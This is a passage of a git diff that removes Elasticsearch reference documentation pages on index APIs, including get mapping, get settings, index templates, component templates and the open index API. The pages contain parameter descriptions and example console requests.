-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] diff --git a/docs/reference/indices/get-mapping.asciidoc b/docs/reference/indices/get-mapping.asciidoc deleted file mode 100644 index a68b7edd5ed..00000000000 --- a/docs/reference/indices/get-mapping.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -[[indices-get-mapping]] -=== Get mapping API -++++ -Get mapping -++++ - -Retrieves <> for one or more indices. For data -streams, the API retrieves mappings for the stream's backing indices. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_mapping --------------------------------------------------- -// TEST[setup:my_index] - -NOTE: Before 7.0.0, the 'mappings' definition used to include a type name. Although mappings -in responses no longer contain a type name by default, you can still request the old format -through the parameter `include_type_name`. For more details, please see <>. - - -[[get-mapping-api-request]] -==== {api-request-title} - -`GET /_mapping` - -`GET //_mapping` - - -[[get-mapping-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[get-mapping-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-type-name] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[get-mapping-api-example]] -==== {api-examples-title} - -[[get-mapping-api-multi-ex]] -===== Multiple data streams and indices - -The get mapping API can be used to get more than one data stream or index with a -single call. General usage of the API follows the following syntax: -`host:port//_mapping` where `` can accept a comma-separated -list of names. To get mappings for all data streams and indices in a cluster, use `_all` or `*` for `` -or omit the `` parameter. -The following are some examples: - -[source,console] --------------------------------------------------- -GET /my-index-000001,my-index-000002/_mapping --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - -If you want to get mappings of all indices in a cluster, the following -examples are equivalent: - -[source,console] --------------------------------------------------- -GET /*/_mapping - -GET /_all/_mapping - -GET /_mapping --------------------------------------------------- -// TEST[setup:my_index] diff --git a/docs/reference/indices/get-settings.asciidoc b/docs/reference/indices/get-settings.asciidoc deleted file mode 100644 index f655a7ff18a..00000000000 --- a/docs/reference/indices/get-settings.asciidoc +++ /dev/null @@ -1,92 +0,0 @@ -[[indices-get-settings]] -=== Get index settings API -++++ -Get index settings -++++ - -Returns setting information for one or more indices. For data streams, the API -returns setting information for the stream's backing indices. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_settings --------------------------------------------------- -// TEST[setup:my_index] - - -[[get-index-settings-api-request]] -==== {api-request-title} - -`GET //_settings` - -`GET //_settings/` - - -[[get-index-settings-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -``:: -(Optional, string) Comma-separated list or wildcard expression of setting names -used to limit the request. - - -[[get-index-settings-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `all`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-defaults] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[get-index-settings-api-example]] -==== {api-examples-title} - -===== Multiple data streams and indices - -The get settings API can be used to get settings for more than one data stream or index with a -single call. To get settings for all indices in a cluster, you can use `_all` or `*` for ``. -Wildcard expressions are also supported. The following are some examples: - -[source,console] --------------------------------------------------- -GET /my-index-000001,my-index-000002/_settings - -GET /_all/_settings - -GET /log_2099_*/_settings --------------------------------------------------- -// TEST[setup:my_index] -// TEST[s/^/PUT my-index-000002\nPUT log_2099_01_01\n/] - -===== Filtering settings by name - -The settings that are returned can be filtered with wildcard matching -as follows: - -[source,console] --------------------------------------------------- -GET /log_2099_-*/_settings/index.number_* --------------------------------------------------- -// TEST[continued] diff --git a/docs/reference/indices/index-mgmt.asciidoc b/docs/reference/indices/index-mgmt.asciidoc deleted file mode 100644 index 0dcfbe04556..00000000000 --- a/docs/reference/indices/index-mgmt.asciidoc +++ /dev/null @@ -1,236 +0,0 @@ -[role="xpack"] -[[index-mgmt]] -== Index management - -{kib}'s *Index Management* features are an easy, convenient way to manage your -cluster's indices, <>, and <>. Practicing good index management ensures your data is stored -correctly and in the most cost-effective way possible. - -[discrete] -[[index-mgmt-wyl]] -=== What you'll learn - -You'll learn how to: - -* View and edit index settings. -* View mappings and statistics for an index. -* Perform index-level operations, such as refreshes and freezes. -* View and manage data streams. -* Create index templates to automatically configure new data streams and indices. - -[discrete] -[[index-mgm-req-permissions]] -=== Required permissions - -If you use {es} {security-features}, the following -<> are required: - -* The `monitor` cluster privilege to access {kib}'s *Index Management* features. -* The `view_index_metadata` and `manage` index privileges to view a data stream -or index's data. -* The `manage_index_templates` cluster privilege to manage index templates. - -To add these privileges in {kib}, go to *Stack Management > Security > Roles*. - -[discrete] -[[view-edit-indices]] -=== View and edit indices - -Open {kib}'s main menu and click *Stack Management > Index Management*. - -[role="screenshot"] -image::images/index-mgmt/management_index_labels.png[Index Management UI] - -The *Index Management* page contains an overview of your indices. -Badges indicate if an index is <>, a -<>, or a -<>. - -Clicking a badge narrows the list to only indices of that type. -You can also filter indices using the search bar. - -You can drill down into each index to investigate the index -<>, <>, and statistics. -From this view, you can also edit the index settings. - -[role="screenshot"] -image::images/index-mgmt/management_index_details.png[Index Management UI] - -[float] -=== Perform index-level operations - -Use the *Manage* menu to perform index-level operations. This menu -is available in the index details view, or when you select the checkbox of one or more -indices on the overview page. The menu includes the following actions: - -* <> -* <> -* <> -* <> -* <> -* <> -* *Add* <> - -[float] -[[manage-data-streams]] -=== Manage data streams - -The *Data Streams* view lists your data streams and lets you examine or delete -them. - -To view more information about a data stream, such as its generation or its -current index lifecycle policy, click the stream's name. - -[role="screenshot"] -image::images/index-mgmt/management_index_data_stream_stats.png[Data stream details] - -To view information about the stream's backing indices, click the number in the -*Indices* column. - -[role="screenshot"] -image::images/index-mgmt/management_index_data_stream_backing_index.png[Backing index] - -[float] -[[manage-index-templates]] -=== Manage index templates - -The *Index Templates* view lists your templates and lets you examine, -edit, clone, and delete them. Changes made to an index template do not -affect existing indices. - -[role="screenshot"] -image::images/index-mgmt/management-index-templates.png[Index templates] - -If you don't have any templates, you can create one using the *Create template* -wizard. - -[float] -==== Try it: Create an index template - -In this tutorial, you’ll create an index template and use it to configure two -new indices. - -*Step 1. Add a name and index pattern* - -. In the *Index Templates* view, open the *Create template* wizard. -+ -[role="screenshot"] -image::images/index-mgmt/management_index_create_wizard.png[Create wizard] - -. In the *Name* field, enter `my-index-template`. - -. Set *Index pattern* to `my-index-*` so the template matches any index -with that index pattern. - -. Leave *Data Stream*, *Priority*, *Version*, and *_meta field* blank or as-is. - -*Step 2. Add settings, mappings, and index aliases* - -. Add <> to your index template. -+ -Component templates are pre-configured sets of mappings, index settings, and -index aliases you can reuse across multiple index templates. Badges indicate -whether a component template contains mappings (*M*), index settings (*S*), -index aliases (*A*), or a combination of the three. -+ -Component templates are optional. For this tutorial, do not add any component -templates. -+ -[role="screenshot"] -image::images/index-mgmt/management_index_component_template.png[Component templates page] - -. Define index settings. These are optional. For this tutorial, leave this -section blank. - -. Define a mapping that contains an <> field named `geo` with a -child <> field named `coordinates`: -+ -[role="screenshot"] -image::images/index-mgmt/management-index-templates-mappings.png[Mapped fields page] -+ -Alternatively, you can click the *Load JSON* link and define the mapping as JSON: -+ -[source,js] ----- -{ - "properties": { - "geo": { - "properties": { - "coordinates": { - "type": "geo_point" - } - } - } - } -} ----- -// NOTCONSOLE -+ -You can create additional mapping configurations in the *Dynamic templates* and -*Advanced options* tabs. For this tutorial, do not create any additional -mappings. - -. Define an index alias named `my-index`: -+ -[source,js] ----- -{ - "my-index": {} -} ----- -// NOTCONSOLE - -. On the review page, check the summary. If everything looks right, click -*Create template*. - -*Step 3. Create new indices* - -You’re now ready to create new indices using your index template. - -. Index the following documents to create two indices: -`my-index-000001` and `my-index-000002`. -+ -[source,console] ----- -POST /my-index-000001/_doc -{ - "@timestamp": "2019-05-18T15:57:27.541Z", - "ip": "225.44.217.191", - "extension": "jpg", - "response": "200", - "geo": { - "coordinates": { - "lat": 38.53146222, - "lon": -121.7864906 - } - }, - "url": "https://media-for-the-masses.theacademyofperformingartsandscience.org/uploads/charles-fullerton.jpg" -} - -POST /my-index-000002/_doc -{ - "@timestamp": "2019-05-20T03:44:20.844Z", - "ip": "198.247.165.49", - "extension": "php", - "response": "200", - "geo": { - "coordinates": { - "lat": 37.13189556, - "lon": -76.4929875 - } - }, - "memory": 241720, - "url": "https://theacademyofperformingartsandscience.org/people/type:astronauts/name:laurel-b-clark/profile" -} ----- - -. Use the <> to view the configurations for the -new indices. The indices were configured using the index template you created -earlier. -+ -[source,console] --------------------------------------------------- -GET /my-index-000001,my-index-000002 --------------------------------------------------- -// TEST[continued] diff --git a/docs/reference/indices/index-template-exists-v1.asciidoc b/docs/reference/indices/index-template-exists-v1.asciidoc deleted file mode 100644 index c71d9cddda4..00000000000 --- a/docs/reference/indices/index-template-exists-v1.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ -[[indices-template-exists-v1]] -=== Index template exists API -++++ -Index template exists (legacy) -++++ - -IMPORTANT: This documentation is about <>, which are deprecated and will be replaced by the composable -templates introduced in {es} 7.8. For information about composable templates, -see <>. - -Checks if an <> exists. - - - -[source,console] ------------------------------------------------ -HEAD /_template/template_1 ------------------------------------------------ - - -[[template-exists-api-request]] -==== {api-request-title} - -`HEAD /_template/` - - -[[template-exists-api-desc]] -==== {api-description-title} - -Use the index template exists API -to determine whether one or more index templates exist. - -Index templates define <>, <>, -and <> that can be applied automatically to new indices. - -[[template-exists-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-template] - - -[[template-exists-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[template-exists-api-response-codes]] -==== {api-response-codes-title} - -`200`:: -Indicates all specified index templates exist. - -`404`:: -Indicates one or more specified index templates **do not** exist. diff --git a/docs/reference/indices/index-templates.asciidoc b/docs/reference/indices/index-templates.asciidoc deleted file mode 100644 index 1fe8597360b..00000000000 --- a/docs/reference/indices/index-templates.asciidoc +++ /dev/null @@ -1,118 +0,0 @@ -[[index-templates]] -= Index templates - -NOTE: This topic describes the composable index templates introduced in {es} 7.8. -For information about how index templates worked previously, -see the <>. - -[[getting]] -An index template is a way to tell {es} how to configure an index when it is created. -For data streams, the index template configures the stream's backing indices as they -are created. Templates are configured prior to index creation and then when an -index is created either manually or through indexing a document, the template -settings are used as a basis for creating the index. - -There are two types of templates, index templates and <>. Component templates are reusable building blocks that configure mappings, settings, and -aliases. You use component templates to construct index templates, they aren't directly applied to a -set of indices. Index templates can contain a collection of component templates, as well as directly -specify settings, mappings, and aliases. - -If a new data stream or index matches more than one index template, the index template with the highest priority is used. - -[IMPORTANT] -==== -{es} has built-in index templates for the `metrics-*-*`, `logs-*-*`, and `synthetics-*-*` index -patterns, each with a priority of `100`. -{ingest-guide}/fleet-overview.html[{agent}] uses these templates to -create data streams. If you use {agent}, assign your index templates a priority -lower than `100` to avoid an overriding the built-in templates. - -Otherwise, to avoid accidentally applying the built-in templates, use a -non-overlapping index pattern or assign templates with an overlapping pattern a -`priority` higher than `100`. - -For example, if you don't use {agent} and want to create a template for the -`logs-*` index pattern, assign your template a priority of `200`. This ensures -your template is applied instead of the built-in template for `logs-*-*`. -==== - -When a composable template matches a given index -it always takes precedence over a legacy template. If no composable template matches, a legacy -template may still match and be applied. - -If an index is created with explicit settings and also matches an index template, -the settings from the create index request take precedence over settings specified in the index template and its component templates. - -[source,console] --------------------------------------------------- -PUT _component_template/component_template1 -{ - "template": { - "mappings": { - "properties": { - "@timestamp": { - "type": "date" - } - } - } - } -} - -PUT _component_template/other_component_template -{ - "template": { - "mappings": { - "properties": { - "ip_address": { - "type": "ip" - } - } - } - } -} - -PUT _index_template/template_1 -{ - "index_patterns": ["te*", "bar*"], - "template": { - "settings": { - "number_of_shards": 1 - }, - "mappings": { - "properties": { - "host_name": { - "type": "keyword" - }, - "created_at": { - "type": "date", - "format": "EEE MMM dd HH:mm:ss Z yyyy" - } - } - }, - "aliases": { - "mydata": { } - } - }, - "priority": 200, - "composed_of": ["component_template1", "other_component_template"], - "version": 3, - "_meta": { - "description": "my custom" - } -} --------------------------------------------------- -// TESTSETUP - -//// - -[source,console] --------------------------------------------------- -DELETE _index_template/* -DELETE _component_template/* --------------------------------------------------- -// TEARDOWN - -//// - -include::simulate-multi-component-templates.asciidoc[] diff --git a/docs/reference/indices/indices-exists.asciidoc b/docs/reference/indices/indices-exists.asciidoc deleted file mode 100644 index ede01258468..00000000000 --- a/docs/reference/indices/indices-exists.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ -[[indices-exists]] -=== Index exists API -++++ -Index exists -++++ - -Checks if an index exists. - -[source,console] --------------------------------------------------- -HEAD /my-index-000001 --------------------------------------------------- -// TEST[setup:my_index] - - -[[indices-exists-api-request]] -==== {api-request-title} - -`HEAD /` - - -[[indices-exists-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] -+ -IMPORTANT: This parameter does not distinguish between an index name and <>, -i.e. status code `200` is also returned if an alias exists with that name. - - -[[indices-exists-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-defaults] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - - -[[indices-exists-api-response-codes]] -==== {api-response-codes-title} - -`200`:: -Indicates all specified indices or index aliases exist. - - `404`:: -Indicates one or more specified indices or index aliases **do not** exist. diff --git a/docs/reference/indices/open-close.asciidoc b/docs/reference/indices/open-close.asciidoc deleted file mode 100644 index 713d007ee9f..00000000000 --- a/docs/reference/indices/open-close.asciidoc +++ /dev/null @@ -1,135 +0,0 @@ -[[indices-open-close]] -=== Open index API -++++ -Open index -++++ - -Opens a closed index. For data streams, the API -opens any closed backing indices. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_open --------------------------------------------------- -// TEST[setup:my_index] -// TEST[s/^/POST \/my-index-000001\/_close\n/] - - -[[open-index-api-request]] -==== {api-request-title} - -`POST //_open` - - -[[open-index-api-desc]] -==== {api-description-title} - -You can use the open index API to re-open closed indices. If the request targets -a data stream, the request re-opens any of the stream's closed backing indices. - -// tag::closed-index[] - -A closed index is blocked for read/write operations and does not allow -all operations that opened indices allow. It is not possible to index -documents or to search for documents in a closed index. This allows -closed indices to not have to maintain internal data structures for -indexing or searching documents, resulting in a smaller overhead on -the cluster. - -When opening or closing an index, the master is responsible for -restarting the index shards to reflect the new state of the index. -The shards will then go through the normal recovery process. The -data of opened/closed indices is automatically replicated by the -cluster to ensure that enough shard copies are safely kept around -at all times. - -You can open and close multiple indices. An error is thrown -if the request explicitly refers to a missing index. This behaviour can be -disabled using the `ignore_unavailable=true` parameter. - -All indices can be opened or closed at once using `_all` as the index name -or specifying patterns that identify them all (e.g. `*`). - -Identifying indices via wildcards or `_all` can be disabled by setting the -`action.destructive_requires_name` flag in the config file to `true`. -This setting can also be changed via the cluster update settings api. - -Closed indices consume a significant amount of disk-space which can cause -problems in managed environments. Closing indices can be disabled via the cluster settings -API by setting `cluster.indices.close.enable` to `false`. The default is `true`. - -The current write index on a data stream cannot be closed. In order to close -the current write index, the data stream must first be -<> so that a new write index is created -and then the previous write index can be closed. - -// end::closed-index[] - -[[open-index-api-wait-for-active-shards]] -===== Wait for active shards - -// tag::wait-for-active-shards[] - -Because opening or closing an index allocates its shards, the -<> setting on -index creation applies to the `_open` and `_close` index actions as well. - -// end::wait-for-active-shards[] - - - - -[[open-index-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list or wildcard (`*`) expression of data streams, indices, and -index aliases used to limit the request. -+ -To target all data streams and indices, use `_all` or `*`. -+ -To disallow use of `_all` or wildcard expressions, -change the `action.destructive_requires_name` cluster setting to `true`. -You can update this setting in the `elasticsearch.yml` file -or using the <> API. - - -[[open-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `closed`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[open-index-api-example]] -==== {api-examples-title} - -The following request re-opens a closed index named `my-index-000001`. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_open --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\nPOST my-index-000001\/_close\n/] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true, - "shards_acknowledged" : true -} --------------------------------------------------- diff --git a/docs/reference/indices/put-component-template.asciidoc b/docs/reference/indices/put-component-template.asciidoc deleted file mode 100644 index 2b935b91143..00000000000 --- a/docs/reference/indices/put-component-template.asciidoc +++ /dev/null @@ -1,212 +0,0 @@ -[[indices-component-template]] -=== Put component template API -++++ -Put component template -++++ - -Creates or updates a component template. -Component templates are building blocks for constructing <> -that specify index <>, <>, -and <>. - -[source,console] --------------------------------------------------- -PUT _component_template/template_1 -{ - "template": { - "settings": { - "number_of_shards": 1 - }, - "mappings": { - "_source": { - "enabled": false - }, - "properties": { - "host_name": { - "type": "keyword" - }, - "created_at": { - "type": "date", - "format": "EEE MMM dd HH:mm:ss Z yyyy" - } - } - } - } -} --------------------------------------------------- -// TESTSETUP - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE _component_template/template_* --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[[put-component-template-api-request]] -==== {api-request-title} - -`PUT /_component_template/` - - -[[put-component-template-api-desc]] -==== {api-description-title} - -An index template can be composed of multiple component templates. -To use a component template, specify it in an index template's `composed_of` list. -Component templates are only applied to new data streams and indices -as part of a matching index template. - -Settings and mappings specified directly in the index template or the <> -request override any settings or mappings specified in a component template. - -Component templates are only used during index creation. For data streams, this -includes data stream creation and the creation of a stream's backing indices. -Changes to component templates do not -affect existing indices, including a stream's backing indices. - -===== Comments in component templates -You can use C-style /* */ block comments in component templates. -You can include comments anywhere in the request body, -except before the opening curly bracket. - -[[put-component-template-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Name of the component template to create. - - -[[put-component-template-api-query-params]] -==== {api-query-parms-title} - -`create`:: -(Optional, Boolean) -If `true`, this request cannot replace or update existing component templates. -Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -[[put-component-template-api-request-body]] -==== {api-request-body-title} - -`template`:: -(Required, object) -This is the template to be applied, may optionally include a `mappings`, -`settings`, or `aliases` configuration. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=aliases] -+ -NOTE: You cannot add data streams to an index alias. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=mappings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=settings] - -`version`:: -(Optional, integer) -Version number used to manage component templates externally. -This number is not automatically generated or incremented by {es}. - -`_meta`:: -(Optional, object) -Optional user metadata about the component template. May have any contents. -This map is not automatically generated by {es}. - -[[put-component-template-api-example]] -==== {api-examples-title} - -===== Component template with index aliases - -You can include <> in a component template. - -[source,console] --------------------------------------------------- -PUT _component_template/template_1 -{ - "template": { - "settings" : { - "number_of_shards" : 1 - }, - "aliases" : { - "alias1" : {}, - "alias2" : { - "filter" : { - "term" : {"user.id" : "kimchy" } - }, - "routing" : "shard-1" - }, - "{index}-alias" : {} <1> - } - } -} --------------------------------------------------- -<1> the `{index}` placeholder in the alias name will be replaced with the -actual index name that the template gets applied to, during index creation. - -[[applying-component-templates]] -===== Applying component templates - -You cannot directly apply a component template to a data stream or index. -To be applied, a component template must be included in an index template's `composed_of` list. See <>. - -[[component-templates-version]] -===== Component template versioning - -You can use the `version` parameter to add a version number to a component template. -External systems can use these version numbers to simplify template management. - -The `version` parameter is optional and not automatically generated or used by {es}. - -To unset a `version`, replace the template without specifying one. - -[source,console] --------------------------------------------------- -PUT /_component_template/template_1 -{ - "template": { - "settings" : { - "number_of_shards" : 1 - } - }, - "version": 123 -} --------------------------------------------------- - -To check the `version`, you can use the <>. - -[[component-templates-metadata]] -===== Component template metadata - -You can use the `_meta` parameter to add arbitrary metadata to a component template. -This user-defined object is stored in the cluster state, -so keeping it short is preferrable. - -The `_meta` parameter is optional and not automatically generated or used by {es}. - -To unset `_meta`, replace the template without specifying one. - -[source,console] --------------------------------------------------- -PUT /_component_template/template_1 -{ - "template": { - "settings" : { - "number_of_shards" : 1 - } - }, - "_meta": { - "description": "set number of shards to one", - "serialization": { - "class": "MyComponentTemplate", - "id": 10 - } - } -} --------------------------------------------------- - -To check the `_meta`, you can use the <> API. diff --git a/docs/reference/indices/put-index-template-v1.asciidoc b/docs/reference/indices/put-index-template-v1.asciidoc deleted file mode 100644 index 578694ef8c2..00000000000 --- a/docs/reference/indices/put-index-template-v1.asciidoc +++ /dev/null @@ -1,259 +0,0 @@ -[[indices-templates-v1]] -=== Put index template API -++++ -Put index template (legacy) -++++ - -IMPORTANT: This documentation is about legacy index templates, -which are deprecated and will be replaced by the composable templates introduced in {es} 7.8. -For information about composable templates, see <>. - -Creates or updates an index template. - -[source,console] --------------------------------------------------- -PUT _template/template_1 -{ - "index_patterns": ["te*", "bar*"], - "settings": { - "number_of_shards": 1 - }, - "mappings": { - "_source": { - "enabled": false - }, - "properties": { - "host_name": { - "type": "keyword" - }, - "created_at": { - "type": "date", - "format": "EEE MMM dd HH:mm:ss Z yyyy" - } - } - } -} --------------------------------------------------- -// TESTSETUP - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE _template/template_* --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[[put-index-template-v1-api-request]] -==== {api-request-title} - -`PUT /_template/` - - -[[put-index-template-v1-api-desc]] -==== {api-description-title} - -Use the PUT index template API -to create or update an index template. - -Index templates define <> and <> -that you can automatically apply when creating new indices. -{es} applies templates to new indices -based on an index pattern that matches the index name. - -NOTE: Composable templates always take precedence over legacy templates. -If no composable template matches a new index, -matching legacy templates are applied according to their order. - -Index templates are only applied during index creation. -Changes to index templates do not affect existing indices. -Settings and mappings specified in <> API requests -override any settings or mappings specified in an index template. - -===== Comments in index templates -You can use C-style /* */ block comments in index templates. -You can include comments anywhere in the request body, -except before the opening curly bracket. - -[[getting-v1]] -===== Getting templates - -See <>. - - -[[put-index-template-v1-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Name of the index template to create. - - -[[put-index-template-v1-api-query-params]] -==== {api-query-parms-title} - -`create`:: -(Optional, Boolean) -If `true`, this request cannot replace or update existing index templates. -Defaults to `false`. - -`order`:: -(Optional,integer) -Order in which {es} applies this template -if index matches multiple templates. -+ -Templates with lower `order` values are merged first. -Templates with higher `order` values are merged later, -overriding templates with lower values. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[put-index-template-v1-api-request-body]] -==== {api-request-body-title} - -`index_patterns`:: -(Required, array of strings) -Array of wildcard expressions -used to match the names of indices during creation. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=aliases] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=mappings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=settings] - -`version`:: -(Optional, integer) -Version number used to manage index templates externally. -This number is not automatically generated by {es}. - - -[[put-index-template-v1-api-example]] -==== {api-examples-title} - -===== Index template with index aliases - -You can include <> in an index template. - -[source,console] --------------------------------------------------- -PUT _template/template_1 -{ - "index_patterns" : ["te*"], - "settings" : { - "number_of_shards" : 1 - }, - "aliases" : { - "alias1" : {}, - "alias2" : { - "filter" : { - "term" : {"user.id" : "kimchy" } - }, - "routing" : "shard-1" - }, - "{index}-alias" : {} <1> - } -} --------------------------------------------------- - -<1> the `{index}` placeholder in the alias name will be replaced with the -actual index name that the template gets applied to, during index creation. - - -[[multiple-templates-v1]] -===== Indices matching multiple templates - -Multiple index templates can potentially match an index, in this case, -both the settings and mappings are merged into the final configuration -of the index. The order of the merging can be controlled using the -`order` parameter, with lower order being applied first, and higher -orders overriding them. For example: - -[source,console] --------------------------------------------------- -PUT /_template/template_1 -{ - "index_patterns" : ["te*"], - "order" : 0, - "settings" : { - "number_of_shards" : 1 - }, - "mappings" : { - "_source" : { "enabled" : false } - } -} - -PUT /_template/template_2 -{ - "index_patterns" : ["tes*"], - "order" : 1, - "settings" : { - "number_of_shards" : 1 - }, - "mappings" : { - "_source" : { "enabled" : true } - } -} --------------------------------------------------- - -The above will disable storing the `_source`, but -for indices that start with `tes*`, `_source` will still be enabled. -Note, for mappings, the merging is "deep", meaning that specific -object/property based mappings can easily be added/overridden on higher -order templates, with lower order templates providing the basis. - -NOTE: Multiple matching templates with the same order value will -result in a non-deterministic merging order. - - -[[versioning-templates-v1]] -===== Template versioning - -You can use the `version` parameter -to add an optional version number to an index template. -External systems can use these version numbers -to simplify template management. - -The `version` parameter is completely optional -and not automatically generated by {es}. - -To unset a `version`, -replace the template without specifying one. - -[source,console] --------------------------------------------------- -PUT /_template/template_1 -{ - "index_patterns" : ["my-index-*"], - "order" : 0, - "settings" : { - "number_of_shards" : 1 - }, - "version": 123 -} --------------------------------------------------- - -To check the `version`, -you can use the <> API -with the <> query parameter -to return only the version number: - -[source,console] --------------------------------------------------- -GET /_template/template_1?filter_path=*.version --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "template_1" : { - "version" : 123 - } -} --------------------------------------------------- \ No newline at end of file diff --git a/docs/reference/indices/put-index-template.asciidoc b/docs/reference/indices/put-index-template.asciidoc deleted file mode 100644 index 047c98ff708..00000000000 --- a/docs/reference/indices/put-index-template.asciidoc +++ /dev/null @@ -1,358 +0,0 @@ -[[indices-put-template]] -=== Put index template API -++++ -Put index template -++++ - -Creates or updates an index template. -Index templates define <>, <>, -and <> that can be applied automatically to new indices. - -[source,console] --------------------------------------------------- -PUT /_index_template/template_1 -{ - "index_patterns" : ["te*"], - "priority" : 1, - "template": { - "settings" : { - "number_of_shards" : 2 - } - } -} --------------------------------------------------- -// TESTSETUP - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE _index_template/template_* --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[[put-index-template-api-request]] -==== {api-request-title} - -`PUT /_index_template/` - - -[[put-index-template-api-desc]] -==== {api-description-title} - -{es} applies templates to new indices based on an -wildcard pattern that matches the index name. - -Index templates are applied during data stream or index creation. -For data streams, these settings and mappings are applied when the stream's backing indices are created. - -Settings and mappings specified in a <> -request override any settings or mappings specified in an index template. - -Changes to index templates do not affect -existing indices, including the existing backing indices of a data stream. - -===== Comments in index templates -You can use C-style /* */ block comments in index templates. You can include comments anywhere in -the request body, except before the opening curly bracket. - -[[put-index-template-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Name of the index template to create. - - -[[put-index-template-api-query-params]] -==== {api-query-parms-title} - -`create`:: -(Optional, Boolean) -If `true`, this request cannot replace or update existing index templates. Defaults to `false`. - -include::{docdir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -[role="child_attributes"] -[[put-index-template-api-request-body]] -==== {api-request-body-title} - -`index_patterns`:: -(Required, array of strings) -Array of wildcard (`*`) expressions -used to match the names of data streams and indices during creation. -+ -[IMPORTANT] -==== -{es} has built-in index templates for the `metrics-*-*`, `logs-*-*`, and `synthetics-*-*` index -patterns, each with a priority of `100`. -{ingest-guide}/fleet-overview.html[{agent}] uses these templates to -create data streams. If you use {agent}, assign your index templates a priority -lower than `100` to avoid an overriding the built-in templates. - -Otherwise, to avoid accidentally applying the built-in templates, use a -non-overlapping index pattern or assign templates with an overlapping pattern a -`priority` higher than `100`. - -For example, if you don't use {agent} and want to create a template for the -`logs-*` index pattern, assign your template a priority of `200`. This ensures -your template is applied instead of the built-in template for `logs-*-*`. -==== - -[xpack]#`data_stream`#:: -(Optional, object) -Indicates whether the template is used to create data streams and their backing -indices. If so, use an empty object as the argument: + 